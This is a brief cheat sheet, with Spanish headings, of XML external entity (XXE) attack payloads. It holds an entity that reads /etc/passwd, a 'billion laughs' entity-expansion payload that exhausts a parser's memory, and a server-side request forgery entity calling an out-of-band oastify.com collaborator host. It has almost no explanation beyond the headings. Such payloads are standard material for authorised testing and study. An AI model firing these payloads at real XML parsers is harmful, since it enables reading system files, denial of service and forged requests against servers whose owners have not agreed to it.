# Ejemplo XXE

<?xml version="1"?>
  <!DOCTYPE xxe [
  <!ENTITY hack "Test">
  ]>
<forgot>
  <username>
    &hack;
  </username>
</forgot>



<?xml version="1"?>
  <!DOCTYPE xxe [
  <!ENTITY hack SYSTEM "file:///etc/passwd">
  ]>
<forgot>
  <username>
    &hack;
  </username>
</forgot>


# XXE Un millon de risas 

<?xml version="1.0" encoding="UTF-8"?>
  <!DOCTYPE example [
  <!ELEMENT example ANY >
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
  ]>
<example>
  &lol9;
</example>

## Server Side Request Forgery 
<!DOCTYPE xxe [ 
  <!ENTITY juju SYSTEM "http://9lvskwimvjek0wq5s8up8ja0grmia8yx.oastify.com?nombre=omar"> 
]>
